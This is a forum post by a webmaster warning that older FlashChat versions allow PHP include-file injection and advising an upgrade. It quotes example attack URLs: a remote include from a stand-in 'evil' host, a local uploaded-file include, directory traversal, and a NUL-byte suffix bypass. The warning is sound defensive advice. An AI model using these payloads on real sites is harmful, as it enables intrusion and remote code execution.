The Alchemist,
The guys at Flashchat have plugged this hole in their current stuff but if you are running an older version of flashchat, you can absolutely and positively get hijacked with an include files injection. I just read a post over at Tufat that reported a huge system problem becuase the hacker was able to use do an injection on an include file for one of the CMSes of a product that wasn't even running on the reporters system.
The vulnerability has to do with being able to access an include file (with no validation mechanism) directly from the browser and being able to "inject" and execute a command to allow access to the system or other nefarious activity. Browsers generally can not can not display php code but they can execute it. The hackers know about sending a command stream through on include files that have not data verification mechanism and that is the key that unlocks the door for them.
According to
Code injection - Wikipedia, the free encyclopedia
Here are some of the ways they do it:
* /vulnerable.php?COLOR=http://evil/exploit - injects a remotely hosted file containing an exploit.
* /vulnerable.php?COLOR=C:\ftp\upload\exploit - injects an uploaded file containing an exploit.
* /vulnerable.php?COLOR=..\..\..\..\ftp\upload\exploi t - injects an uploaded file containing an exploit, using directory traversal.
* /vulnerable.php?COLOR=C:\notes.txt%00 - example using NUL meta character to remove the .php suffix, allowing access to other files than .php. (PHP setting "magic_quotes_gpc = On", which is default, would stop this attack)
If you are interested, do a search for "code injection vulnerability" you'll be surprised at how much stuff you can find on the web about it.
The fix is very simple for the flashchat one and can be back ported easy enough if you can't upgrade, but upgrading is a much better recommedation.
The current version of flashchat at this is written is 4.75
regards,
mikesz, webmaster
AllAboutDatingSites.com
Linear Mode
